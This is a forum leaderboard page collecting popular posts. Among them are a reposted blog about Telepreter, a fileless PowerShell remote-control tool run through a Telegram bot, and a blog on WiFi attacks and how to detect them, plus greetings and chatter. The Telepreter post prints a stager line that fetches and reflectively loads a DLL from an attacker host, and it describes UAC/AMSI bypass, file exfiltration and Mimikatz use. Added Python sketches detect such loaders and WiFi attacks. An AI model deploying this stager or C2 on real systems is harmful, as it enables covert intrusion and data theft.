
Leaderboard

Popular Content

Showing content with the highest reputation on 01/02/19 in all areas

  1. Introduction

In this post I will share some experience I had while working on a project named Telepreter. Telepreter is a PowerShell Runspace that uses the Telegram bot API as transport and communications and C# DLL reflection to stay in-memory. So you can control your shells with a Telegram group and a single bot. Even further, I tried to add my favorite tools into it. So it has built-in AMSI and UAC bypasses from my earlier blog posts and some other excellent tools that I like very much, like PowerView and PowerPreter.

Side-Note: This is just a PoC, and an idea that I wanted to make happen. I do not intend to develop it further.

Building a Telegram Bot with PowerShell execution capabilities

So I decided to build a Telegram bot capable of remote controlling a Windows computer. But more importantly, I wanted it fileless, so I chose using C# + PowerShell again, so we can operate in-memory and not rely on disk at all.

Telegram API choice

I researched some libraries in C# that might suit my need, and found one that had all the functionalities that I wished for in this repository; after compiling the code, I had a Telegram.Bot.dll and NewtonSoft.dll, which are dependencies.

Initial problems

I had to work out how to load these DLLs in a manner that would not drop anything on disk. So I resorted to Reflection (again...). Compressing and obfuscating all the DLL code into a base64 string constant value, I am able to create a function that can load these assemblies in memory, so we won't have any exception when Telegram API functions are invoked.

Crafting a small fileless PowerShell stager payload

To start a new bot instance on our victim, all that needs to be executed is the following line in PowerShell:

[Reflection.Assembly]::Load((iwr attackerc2.com/telepreter.dll).Content)/[Telepreter.Agent]::Load();[Telepreter.Agent]::new().Start()

In turn, I developed and integrated into the bot a function to create a stager payload. This way, an attacker can create a .bat which could be used to infect more computers inside the network or to spawn elevated bot instances (more on this later).

Core functionalities

How to control the bot

To execute a command, simply type /bot:BOT_ID /shell PowerShellCommandHere

PS: Don't worry about output size. The bot will send 200 lines once a second, so every output is sent to you!

How to download files

To download a file, simply type /bot:BOT_ID /download C:\windows\system32\license.rtf and the bot will send this file in the group using the Telegram file upload API!

How to Port Scan with it!

It is also useful for Recon, too! There is a slightly modified version of Invoke-Portscan from the Nishang pack. No need to do fancy pivoting tricks to scan the internal network!

How to bypass UAC with it!

Check how I bypassed UAC in a Lab computer that was infected with it! In the above picture, I created a .bat stager that resided in the user temporary folder. This tiny stager will fetch the DLL using the supplied URL and then use reflection to load all dependencies and start the main function of the bot. Looking at the picture above, it is possible to observe that a new instance of a bot has started. And the Administrator flag is set to True, which means this is an elevated session and we can use post-exploitation tools like Invoke-Mimikatz or others that require elevated privileges to work. To avoid having problems with multiple instances, never stay with more than one active session.

Conclusion and Code

This concludes the demonstration of this fun project I was working on for a few days. Feel free to dig into it as much as you want to. Probably a lot of people are going to say that it is crappy code... but it really is! I am no professional programmer. It is just a demonstration of how something like that could work. Of course there are a ton of better ways of doing it. So feel free to do it if you like!

To get access to the source-code: Link

To start your own bot, just replace the following values in the code:

Have fun. Best regards, zc00l.

Source: https://0x00-0x00.github.io/tools/2018/12/10/Pwning-Computers-using-Telegram-bot-API.html
    4 points
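The stager one-liner in the post above has a shape a defender can key on: bytes fetched with iwr and handed straight to [Reflection.Assembly]::Load(), so the DLL never touches disk. The following is an added example, not part of the post or of the Telepreter code: a small Python scorer run over constructed records that mimic the ScriptBlockText field of Windows PowerShell Script Block Logging events (Event ID 4104). The field names, indicator weights and alert threshold are assumptions chosen for the example.

```python
"""Score PowerShell script-block log records for the fileless loader pattern
seen in the stager one-liner: bytes fetched over HTTP and passed straight to
[Reflection.Assembly]::Load(), so nothing touches disk.

Added example, not code from the Telepreter project. The records below are
constructed to resemble the ScriptBlockText field of Windows PowerShell
Script Block Logging events (Event ID 4104); field names, weights and the
alert threshold are assumptions for the example.
"""
import re

# Indicators drawn from the stager line, plus their common long-form spellings.
REFLECTIVE_LOAD = re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\s*\(", re.I)
WEB_FETCH = re.compile(r"\b(iwr|Invoke-WebRequest|DownloadData|DownloadString|Net\.WebClient)\b", re.I)
RAW_BYTES = re.compile(r"\.Content\b|\[byte\[\]\]|FromBase64String", re.I)
START_TYPE = re.compile(r"\[[A-Za-z_][\w.]*\]::new\(\)\.\w+\(\)")  # [Type]::new().Start()

INDICATORS = (("reflective_load", REFLECTIVE_LOAD), ("web_fetch", WEB_FETCH),
              ("raw_bytes", RAW_BYTES), ("start_type", START_TYPE))


def score_script_block(text):
    """Return (score, matched indicator names) for one ScriptBlockText value."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    score = len(hits)
    # The combination is what matters: network-sourced bytes loaded as an
    # assembly. Either indicator alone is common in benign scripts.
    if "reflective_load" in hits and "web_fetch" in hits:
        score += 2
    return score, hits


def find_fileless_loaders(events, threshold=4):
    """Return alert dicts for every event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_script_block(ev["ScriptBlockText"])
        if score >= threshold:
            alerts.append({"host": ev["Computer"], "score": score, "hits": hits,
                           "snippet": ev["ScriptBlockText"][:80]})
    return alerts


SAMPLE_EVENTS = [  # constructed records, not real logs
    {"Computer": "WS01", "ScriptBlockText":
        "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    {"Computer": "WS01", "ScriptBlockText":
        "[Reflection.Assembly]::Load((iwr http://attackerc2.example/telepreter.dll).Content);"
        "[Telepreter.Agent]::Load();[Telepreter.Agent]::new().Start()"},
    {"Computer": "WS02", "ScriptBlockText":
        "$b=(New-Object Net.WebClient).DownloadData('http://x.example/a.dll');"
        "[System.Reflection.Assembly]::Load([byte[]]$b)"},
    {"Computer": "WS03", "ScriptBlockText":  # benign: partial-name load, no download
        "[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')"},
    {"Computer": "WS03", "ScriptBlockText":  # benign: download to disk, no load
        "Invoke-WebRequest https://example.org/report.csv -OutFile C:\\tmp\\report.csv"},
]

if __name__ == "__main__":
    for alert in find_fileless_loaders(SAMPLE_EVENTS):
        print(alert["host"], alert["score"], alert["hits"])
```

Script Block Logging records a block as PowerShell executes it, so wrapping the stager in a .bat or an -EncodedCommand does not hide the decoded one-liner from this kind of match; the two benign records are there to show that a reflective load or a download on its own does not cross the threshold.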
  2. "On 11/25/2017 at 6:12 PM, adineamtu01 said:" Mind the date. Why, aladin, do you want to download 10000 books at once? Anyway... https://archive.org/ This is, by far, the best source I know. I even found "Introducere in algoritmi" by Thomas H Cormen, a book that costs over 500 RON, in Romanian, in full.
    2 points
  3. Happy New Year! http://rstelion.cf/
    2 points
  4. Good evening. Happy New Year! Please tell me how to go about downloading those 10000 books, and also how I can download the two books by Igor Bergler. Thank you.
    1 point
  5. https://www.youtube.com/watch?v=OZxeZSJ4PlU Happy New Year, fellow forum members!
    1 point
  6. @ARUBA @aismen @alexandudanca this thread was opened so that we could wish each other a Happy New Year on the occasion of the new year, and I want it to stay that way.
    1 point
  7. As an idea, if it helps, I can give you my own example. I started learning networking some time ago and I was told I would need math. I don't deny it, you need some math, but it is simple math and you basically learn it by swimming through networking topics. I tend to think that is your case too. Don't start learning math just because you want to learn databases. It's like learning to be a good mechanic because you want to be a truck driver. If you are passionate enough, everything comes by itself. The math, the databases, and the drinking after a successful project :P
    1 point
  8. Happy New Year, and lots of money in the new year!
    1 point
  12. https://explainshell.com/
    1 point
  13. Common WiFi Attacks And How To Detect Them

Posted on September 19, 2017 in wifi, security

I'm talking about DFIR (Digital Forensics and Incident Response) for WiFi networks at DerbyCon 2017 and will be releasing nzyme (an open source tool to record and forward 802.11 management frames into Graylog for WiFi security monitoring and incident response) soon.

Note that I will simplify some of the 802.11 terminology in this post. For example, I'll talk about "devices" and not "stations," and I'll not use the term "BSS" for "networks."

The Issue With 802.11 Management Frames

The 802.11 WiFi standard contains a special frame (think "packets" in classic, wired networking) type for network and connection management. For example, your computer is not actively "scanning for networks" when you hit the tray icon to see all networks in range, but it passively listens for so-called "beacon" management frames from access points broadcasting to the world that they are there and available. Another management frame is the "probe-request" ("Hi, is my home network in range?") that your devices are sending to see if networks they connected to before are in range. If such a network is in range, the relevant access points would respond with a "probe-response" frame ("Hi, yes I'm here! You can connect to me without waiting for a beacon frame.")

The problem with management frames is that they are completely unencrypted. This makes WiFi easy to use because, for example, you can see networks and their names around you without exchanging some key or password first, but it also makes WiFi networks prone to many kinds of attacks.

Common Attacks Explained

Sniffing Traffic

Virtually all WiFi traffic can be sniffed with adapters in monitor mode. Most Linux distributions support putting certain WiFi chipsets into this special mode that will process all traffic in the air and not only that of a network you are connected to. Everyone can get WiFi adapters with such a chipset from Amazon, some for less than $20.

Encrypted networks will also not really protect you. WEP encryption can be cracked in a matter of minutes, and even WPA2-PSK is not secure if you know the passphrase of a network (for example, because it's the office network and you work there, or because the local coffee shop has it written on the door) and can listen to the association process of the device. This works because the device-specific encryption between you and the access point uses a combination of the network passphrase and another key that is publicly exchanged (remember, management frames are not encrypted) during the association process. An attacker could force a new authentication process by spoofing a deauthentication frame that will disconnect your device for a moment (more on that below).

Detecting Sniffers

Sniffing traffic is passive and cannot be detected. As a user, consider all WiFi traffic, on open or closed networks, to be public and make sure to use encryption on higher layers, like HTTPS. (Really, you should be doing this anyway, in any network.)

Brute-Forcing Access

Like any other password, passphrases for wireless networks can be brute-forced. WEP can be cracked by analyzing recorded traffic within minutes and has been rendered useless. For WPA secured networks you'd need a standard dictionary attack that just tries a lot of passwords.

Detecting Brute Force Attacks

Brute-forcing by actually authenticating to an access point is extremely slow and not even necessary. Most brute force cracking tools work against recorded (sniffed) WiFi traffic. An attacker could just quietly sit in the car in front of your office, recording traffic for some time, and then crack the password at home. Like sniffing, this approach cannot be detected. The only protection is to use a strong password and to avoid WEP.

Jamming

The obvious way of jamming WiFi networks would be just to pump the relevant frequencies full of garbage. However, this would require fairly specialist equipment and maybe even quite some transmitting power. Surprisingly, the 802.11 standard brings a much easier way: Deauthentication and disassociation frames. Those "deauth" frames are supposed to be used in different scenarios, and the standard has more than 40 pre-defined reason codes. I selected a few to give you an idea of some legitimate use-cases:

- Previous authentication no longer valid
- Disassociated due to inactivity
- Disassociated because AP is unable to handle all currently associated STAs
- Association denied due to requesting STA not supporting all of the data rates in the BSSBasicRateSet parameter
- Requested from peer STA as the STA is leaving the BSS (or resetting)

Because deauth frames are management frames, they are unencrypted, and anyone can spoof them even when not connected to a network. Attackers in range can send constant deauth frames that appear to come from the access point you are connected to (by just setting the "transmitter" address in the frame) and your device will listen to that instruction. There are "jammer" scripts that sniff out a list of all access points and clients, while constantly sending deauth frames to all of them.

Detecting Jammers

A tool like nzyme (to be released - see introduction) would sniff out the deauth frames, and Graylog could alert on unusual levels of this frame subtype.

Rogue Access Points

Let's talk about how your phone automatically connects to WiFi networks it thinks it knows. There are two different ways this can happen:

1. It picks up beacon frames ("Hi, I'm network X and I'm here.") of a network it knows and starts associating with the closest (strongest signal) access point.
2. It sends a probe-request frame ("Hello, is an access point serving network X around?") for a known network, and an access point serving such a network responds with a probe-response frame ("Hello, yep I'm here!"). Your phone will then connect to that access point.

Here is the problem: Any device can send beacon and probe-response frames for any network. Attackers can walk around with a rogue access point that responds to any probe-request with a probe-response, or they could start sending beacons for a corporate network they are targeting. Some devices now have protections and will warn you if they are about to connect to a network that is not encrypted but was previously encrypted. However, this does not help if an attacker knows the password or just targets an unencrypted network of your coffee shop. Your phone would blindly connect, and now you have an attacker sitting in the middle of your connection, listening to all your communications or starting attacks like DNS or ARP poisoning. An attacker could even show you a malicious captive portal (the sign-in website some WiFi networks show you before they'll let you in) to phish or gather more information about your browser. Take a look at a miniaturized attack platform like the famous WiFi Pineapple to get an idea of how easy it is to launch these kinds of attacks.

Rogue access points are notoriously hard to spot because it's complicated to locate them physically and they usually blend into the existing access point infrastructure quite well - at least on the surface. Here are some ways to still spot them using my to-be-released tool nzyme and Graylog:

Detecting Rogue Access Points

Method 1: BSSID whitelisting

Like other network devices, every WiFi access point has a MAC address that is part of every message it sends. A simple way to detect rogue access points is to keep a list of your trusted access points and their MAC addresses and to match this against the MAC addresses that you see in the air. The problem is that an attacker can easily spoof the MAC address and, by doing that, circumvent this protective measure.

Method 2: Non-synchronized MAC timestamps

It is important that every access point that spawns the same network has a highly synchronized internal clock. For that reason, the access points are constantly exchanging timestamps for synchronization in their beacon frames. The unit here is microseconds, and the goal is to stay synchronized within a delta of 25µs. Most rogue access points will not attempt to synchronize the timestamps properly, and you can detect that slip.

Method 3: Wrong channel

You could keep a list of what channels your access points are operating on and find out if a rogue access point is using a channel your infrastructure is not supposed to use. For an attacker, being detected by this method is extremely easy: Recon the site first and configure the rogue access point to only use already used channels. Another caveat here is that many access points will dynamically switch channels based on capacity anyway.

Method 4: Crypto drop

An attacker who does not know the password of an encrypted network she targets might start a rogue access point that spins up an open network instead. Search for networks with your name, but no (or the wrong) encryption.

Method 5: Signal strength anomalies

There are many ways to spot a rogue access point by analyzing signal strength baselines and looking for anomalies. If an attacker sits in the parking lot and is spoofing one of your access points, including its MAC address (BSSID), it will suddenly have a change in the mean signal strength because he is further away from the sensor (nzyme) than the real access point.

What's Next?

I will share another post with examples on how to detect these attacks using nzyme and Graylog soon. For updates, make sure to follow me on Twitter or to subscribe to the blog.

Written By Lennart Koopmann. Follow me on Twitter or subscribe to the blog.

Source: https://wtf.horse/2017/09/19/common-wifi-attacks-explained/
    1 point
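Two of the detection ideas from the post above, worked through as an added example that is not nzyme or Graylog code: alerting on an unusual volume of deauth frames per claimed transmitter (the jamming section), and applying rogue-AP methods 1, 2, 4 and 5 (BSSID whitelist, beacon timestamp drift, crypto drop, signal strength anomaly) to beacon frames. It runs over constructed records standing in for decoded 802.11 management frames; the field names, the trusted-AP inventory, the 20-deauths-per-second threshold and the 15 dB RSSI tolerance are assumptions, while the 25µs timestamp delta is the figure the post gives.

```python
"""Detection sketches for the jamming and rogue access point sections of the
post: a deauth-flood counter and a beacon checker applying the whitelist, TSF
drift, crypto-drop and signal-strength methods.

Added example, not nzyme or Graylog code. It runs over constructed records
standing in for decoded 802.11 management frames; the field names and all
thresholds except the post's 25 microsecond TSF delta are assumptions.
"""
from collections import Counter, defaultdict

TRUSTED_APS = {  # constructed inventory: BSSID -> expected SSID, encryption, RSSI baseline
    "aa:bb:cc:00:00:01": {"ssid": "CorpWiFi", "rsn": True, "rssi_mean": -55},
    "aa:bb:cc:00:00:02": {"ssid": "CorpWiFi", "rsn": True, "rssi_mean": -60},
}


def deauth_flood(frames, window_s=1.0, threshold=20):
    """Count deauth/disassoc frames per claimed transmitter per time bucket and
    return {bssid: peak count} for transmitters that reach the threshold.
    A spoofed flood stands out because one BSSID emits far more deauths than
    an AP would for the legitimate reason codes listed in the post."""
    buckets = Counter()
    for f in frames:
        if f["subtype"] in ("deauth", "disassoc"):
            buckets[(f["bssid"], int(f["t"] // window_s))] += 1
    peak = defaultdict(int)
    for (bssid, _), n in buckets.items():
        peak[bssid] = max(peak[bssid], n)
    return {b: n for b, n in peak.items() if n >= threshold}


def rogue_ap_findings(frames, trusted=TRUSTED_APS, max_tsf_drift_us=25, rssi_tolerance_db=15):
    """Apply methods 1, 2, 4 and 5 from the post to beacon frames that carry one
    of the trusted SSIDs. Returns a list of (bssid, finding) tuples."""
    trusted_ssids = {ap["ssid"] for ap in trusted.values()}
    findings = []
    reference = {}  # ssid -> (capture time, TSF) of the first trusted beacon seen
    for f in frames:
        if f["subtype"] != "beacon" or f["ssid"] not in trusted_ssids:
            continue
        bssid, ssid = f["bssid"], f["ssid"]
        expected = trusted.get(bssid)
        if expected is None:                       # method 1: BSSID whitelist
            findings.append((bssid, "unknown_bssid_for_trusted_ssid"))
        if not f["rsn"]:                           # method 4: crypto drop
            findings.append((bssid, "open_network_with_trusted_ssid"))
        if ssid in reference:                      # method 2: TSF drift vs. a trusted AP
            t0, tsf0 = reference[ssid]
            drift_us = f["tsf"] - (tsf0 + (f["t"] - t0) * 1e6)
            if abs(drift_us) > max_tsf_drift_us:
                findings.append((bssid, "tsf_drift_%dus" % round(drift_us)))
        elif expected is not None:
            reference[ssid] = (f["t"], f["tsf"])
        if expected is not None:                   # method 5: signal strength anomaly
            if abs(f["rssi"] - expected["rssi_mean"]) > rssi_tolerance_db:
                findings.append((bssid, "rssi_anomaly"))
    return findings


FRAMES = [  # constructed capture; t in seconds since capture start, tsf in microseconds
    {"t": 0.0000, "subtype": "beacon", "bssid": "aa:bb:cc:00:00:01", "ssid": "CorpWiFi",
     "channel": 6, "rsn": True, "tsf": 1_000_000, "rssi": -55},
    {"t": 0.1024, "subtype": "beacon", "bssid": "aa:bb:cc:00:00:02", "ssid": "CorpWiFi",
     "channel": 11, "rsn": True, "tsf": 1_102_410, "rssi": -60},      # 10us off: within spec
    # Rogue AP cloning the SSID: unknown BSSID, open, and its own unsynchronised clock
    {"t": 0.2048, "subtype": "beacon", "bssid": "de:ad:be:ef:00:01", "ssid": "CorpWiFi",
     "channel": 6, "rsn": False, "tsf": 50_000_000, "rssi": -40},
    # Attacker in the parking lot spoofing AP 01, BSSID included: only the RSSI gives it away
    {"t": 0.3072, "subtype": "beacon", "bssid": "aa:bb:cc:00:00:01", "ssid": "CorpWiFi",
     "channel": 6, "rsn": True, "tsf": 1_307_205, "rssi": -85},
    # One legitimate deauth (reason 4, inactivity) from AP 02
    {"t": 5.0, "subtype": "deauth", "bssid": "aa:bb:cc:00:00:02", "dst": "11:22:33:44:55:66", "reason": 4},
]
# ... versus a spoofed flood: 40 deauths "from" AP 01 to 40 clients inside one second
FRAMES += [{"t": 1.0 + i * 0.02, "subtype": "deauth", "bssid": "aa:bb:cc:00:00:01",
            "dst": "11:22:33:44:55:%02x" % i, "reason": 7} for i in range(40)]

if __name__ == "__main__":
    print("deauth flood:", deauth_flood(FRAMES))
    for bssid, finding in rogue_ap_findings(FRAMES):
        print("rogue AP:", bssid, finding)
```

The fourth beacon illustrates the limit the post describes: once the attacker spoofs a trusted BSSID, keeps encryption on and syncs the timestamp, only the signal-strength baseline (method 5) still flags it, and that needs a sensor whose position relative to the real access points is stable.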
  14. 20 to 13. That is, twenty minutes to one. 1 <= h <= 12
    -1 points